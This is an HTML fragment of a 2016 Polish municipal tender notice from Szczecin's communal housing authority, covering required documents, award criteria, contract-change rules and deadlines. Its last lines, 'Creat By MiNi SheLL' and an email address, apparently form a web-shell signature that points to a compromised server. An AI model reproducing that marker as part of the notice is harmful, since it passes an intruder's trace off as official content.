<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	oferta cenowa zgodnie z Rozdziałem I ust. 3 siwz; 
W przypadku składania oferty wspólnej należy złożyć jeden dokument
2)	odpowiednie pełnomocnictwa;
tylko w sytuacjach określonych w Rozdziale I ust. 5 zdanie 2  siwz lub w przypadku składania oferty wspólnej (Rozdział III ust. 1 siwz)
3)	oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz wskazujące część zamówienia, której wykonanie wykonawca powierzy podwykonawcom (jeżeli wykonawca przewiduje udział podwykonawców);
W przypadku składania oferty wspólnej należy złożyć jeden dokument
4)	oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz, potwierdzające, 
że wykonawca na 2 dni  przed podpisaniem umowy przedłoży kosztorysy szczegółowe dla każdej z branż oddzielnie, dla każdego lokalu mieszkalnego, sporządzone zgodnie z postanowieniami Rozdziału X siwz.
W przypadku składania oferty wspólnej należy złożyć jeden dokument 
5)	oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz, potwierdzające, że wykonawca przed podpisaniem umowy przedłoży opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej                               z przedmiotem zamówienia, na kwotę nie niższą niż wysokość wynagrodzenia na czas trwania robót budowlanych.
W przypadku składania oferty wspólnej należy złożyć jeden dokument</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 97</li>
<li>2 - Okres gwarancji - 3</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W związku z art. 144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający dopuszcza zmiany zawartej umowy w zakresie:
1)	terminu wykonania zamówienia 
a)	w przypadku wystąpienia okoliczności nieprzewidzianych i niezależnych od Wykonawcy przy zachowaniu przez niego należytej staranności, skutkujących niemożnością dotrzymania terminu realizacji przedmiotu umowy,
b)	w przypadku wystąpienia okoliczności leżącej po stronie Zamawiającego, w szczególności wstrzymania robót przez Zamawiającego, konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji technicznej,
c)	w przypadku warunków pogodowych uniemożliwiających ze względów technologicznych prowadzenie robót - pomimo dołożenia przez Wykonawcę wszelkich starań, aby roboty mogły zostać zrealizowane,
d)	w przypadku wystąpienia robót zamiennych, przez które rozumie się roboty, które nie wykraczają poza przedmiot zamówienia, wprowadzające jedynie zmiany ulepszające, zapewniające osiągniecie celu procesu budowlanego, rozwiązanie zamienne w zakresie rodzaju zastosowanych materiałów w technologii wykonywanych robót, zmiana technologii wykonania robót, a ich wystąpienie będzie miało istotny wpływ na przesunięcie terminu zakończenia robót,
e)	w przypadku wystąpienia  przeszkody o obiektywnym charakterze (zdarzenie nadzwyczajne, zewnętrzne i niemożliwe do zapobieżenia, a więc mieszczące się w zakresie pojęciowym tzw. siły wyższej. Strony zobowiązują się do natychmiastowego poinformowania się nawzajem o wystąpieniu ww. przeszkód.
2)	osób przewidzianych do realizacji umowy po stronie Wykonawcy (ujętych w wykazie zawartym w ofercie), pod warunkiem, że nowe osoby będą posiadały kwalifikacje zgodne z wymogiem opisanym w siwz. Zmiana taka będzie dopuszczalna w przypadku choroby, wypadku, śmierci lub w sytuacji, gdy osoba przewidziana do realizacji umowy, nie wywiązuje się należycie ze swoich obowiązków lub z innej niezależnej od Wykonawcy przyczyny. Zmiana osób wymaga zgody Zamawiającego, pod rygorem odstąpienia od umowy lub zapłaty kary umownej wskazanej w § 12 ust. 1 pkt 5 umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zbilk.szczecin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Budynków i Lokali Komunalnych
ul. Mariacka 25, pokój nr 12
70-546 Szczecin
po okazaniu dowodu wpłaty na kwotę 50 zł na konto 91 1020 4795 0000 9202 0292.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.06.2016 godzina 09:00, miejsce: Zarząd Budynków i Lokali Komunalnych
ul. Mariacka 25, pokój nr 12
70-546 Szczecin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zgodnie z art. 24 ust. 2a ustawy, Zamawiający wyklucza z postępowania o udzielenie zamówienia wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co Zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych, jeżeli Zamawiający przewidział taką możliwość wykluczenia Wykonawcy w ogłoszeniu o zamówieniu, w specyfikacji istotnych warunków zamówienia lub w zaproszeniu do negocjacji. Zamawiający nie wyklucza z postępowania o udzielenie zamówienia Wykonawcy, który udowodni, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszaniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com